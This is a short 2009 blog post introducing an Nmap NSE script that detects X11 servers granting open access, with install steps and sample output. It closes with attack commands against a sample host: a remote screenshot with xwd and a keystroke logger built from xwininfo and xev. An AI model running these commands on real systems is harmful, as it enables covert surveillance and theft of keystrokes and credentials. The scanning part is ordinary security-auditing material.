Nmap NSE Script "x11-access.nse"

Wed, 29 Jul 2009 21:06:42 +0200
Tags: security, network

If a X server is listening on TCP port 6000+n (where n is the display number), it is possible to probe if you have access to this server by sending a X11 initial connection request.

I wrote a NSE script (Nmap Scripting Engine) that will check this if one of the port 6000+n are opened. Since Nmap version 5.10BETA1, this script is included in Nmap:

If you use a previous version of the tool, include this script in your Nmap's scripts database. It consists in moving the script into the default scripts directory (usually "/usr/share/nmap/scripts" or "/usr/local/share/nmap/scripts") and run:

# nmap --script-updatedb

Output looks like this (launched with the "-sC" option):

# nmap -sC 192.168.0.44

Starting Nmap 5.00 ( http://nmap.org ) at 2009-07-29 10:59 CEST
[...]
PORT     STATE SERVICE
6000/tcp open  X11
|_ x11-access: X server access is granted

Here are a few ideas of what you can do when you are granted on a X server:

Remote snapshot:

$ xwd -silent -root -display 192.168.0.44:0.0 -out snapshot.xwd
    $ xwud -in snapshot.xwd

Remote key logger:

$ xwininfo -display 192.168.0.44:0.0 -root /* to get the root window id */
    $ xwininfo -display 192.168.0.44:0.0 -children -id <root_window_id>
$ xev -display 192.168.0.44:0.0 -id 0x<window_id>